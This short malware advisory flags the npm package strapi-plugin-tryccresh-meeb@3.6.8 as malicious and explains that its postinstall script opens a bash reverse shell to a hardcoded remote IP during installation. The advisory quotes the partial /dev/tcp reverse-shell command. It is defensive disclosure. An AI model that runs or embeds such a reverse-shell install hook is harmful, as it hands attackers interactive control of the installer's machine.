OpenSSF/OSV advisory MAL-2026-16190 confirms this npm version as malicious. The package's postinstall lifecycle script (postinstall.js) uses child_process.exec to spawn `bash -c 'bash -i > /dev/tcp/14.225.210.85/443...'`, opening an interactive reverse shell from the installer's host to a hardcoded remote IP on `npm install`. It also drops a marker file under /tmp. The package's own description self-identifies as a Strapi reverse-shell payload.
This report applies to strapi-plugin-tryccresh-meeb@3.6.8.
